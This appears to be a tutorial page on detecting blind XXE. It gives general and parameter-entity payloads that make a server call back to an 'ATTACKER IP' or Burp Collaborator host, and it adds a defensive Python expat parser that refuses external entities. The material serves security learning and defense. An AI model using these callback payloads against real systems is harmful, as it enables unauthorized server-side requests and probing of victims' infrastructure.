
Identification


Last updated 2 years ago

We can normally detect Blind XXE the same way we trigger an XXE SSRF attack:

<!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "http://ATTACKER IP"> ]>

This payload makes the server issue a back-end HTTP request to the attacker's URL. Meanwhile the attacker monitors for the resulting DNS lookup and HTTP request, which confirms the Blind XXE.

Use the above payload in the check-product XML request, replace the host with your current Burp Collaborator client's host, and wait for the HTTP ping back.

Sometimes XXE attacks using regular entities are blocked, either by input validation in the application's back end or because the XML parser has been hardened.

In such situations we can use XML parameter entities instead. Parameter entities are XML entities themselves, and they can be referenced elsewhere within the DTD.

  • The declaration of an XML parameter entity includes the percent character before the entity name:

<!ENTITY % myparameterentity "my parameter entity value" >
  • Parameter entities are referenced using the percent character instead of the usual &:

%myparameterentity;

This means we can detect and exploit Blind XXE using out-of-band network interaction with the following payload:

<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://ATTACKER'S IP"> %xxe; ]>

When we try our usual way to exploit this, we get an error stating that entities are not allowed for security reasons.

So this means we cannot insert an external entity and call it in the productID parameter.

This XXE payload creates an XML parameter entity called xxe and then uses that entity within the DTD.
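From the defending side, the two declaration forms above (a general entity used as &xxe; and a parameter entity used as %xxe;) are exactly what a hardened parser has to refuse before anything is resolved. The following Python is an added example, not code from this GitBook: it uses the standard-library expat hooks to inventory entity declarations and to refuse every external reference, so the out-of-band request the detection relies on never leaves the server. The sample documents and the collab.invalid host are constructed stand-ins for the page's ATTACKER IP placeholder.

```python
import xml.parsers.expat as expat


class ExternalEntityRefused(Exception):
    """Raised by the parser hook when the document tries to resolve an external entity."""


def inspect_xml(xml_bytes: bytes) -> dict:
    """Inventory DTD entity declarations and refuse any external resolution.

    Returns {"entities": [...], "blocked": bool, "reason": str}. Each entity record
    holds the name, whether it is a parameter entity (declared with '%') and
    whether it points at a SYSTEM/PUBLIC identifier. expat never fetches external
    resources itself; it asks ExternalEntityRefHandler, and this hook answers by
    raising, so no request is sent to the host named in the payload.
    Malformed XML raises expat.ExpatError to the caller.
    """
    entities = []
    parser = expat.ParserCreate()

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        entities.append({
            "name": name,
            "parameter": bool(is_param),
            "system_id": system_id,
            "external": system_id is not None or public_id is not None,
        })

    def on_external_ref(context, base, system_id, public_id):
        raise ExternalEntityRefused(f"refused external entity reference to {system_id!r}")

    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    # Also process parameter entities, so the "%xxe;" form inside the internal
    # subset reaches the refusal hook instead of being skipped silently.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
    try:
        parser.Parse(xml_bytes, True)
    except ExternalEntityRefused as exc:
        return {"entities": entities, "blocked": True, "reason": str(exc)}
    return {"entities": entities, "blocked": False, "reason": ""}


# Constructed samples; collab.invalid stands in for the page's ATTACKER IP placeholder.
SAMPLE_GENERAL = (b'<!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "http://collab.invalid/"> ]>'
                  b'<stockCheck><productId>&xxe;</productId></stockCheck>')
SAMPLE_PARAM = (b'<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://collab.invalid/"> %xxe; ]>'
                b'<stockCheck><productId>1</productId></stockCheck>')
SAMPLE_BENIGN = b'<stockCheck><productId>1</productId></stockCheck>'
```

Logging the returned entity records (name, parameter flag, system identifier) at the point of refusal gives the detection signal for both payload shapes without the parser ever contacting the named host.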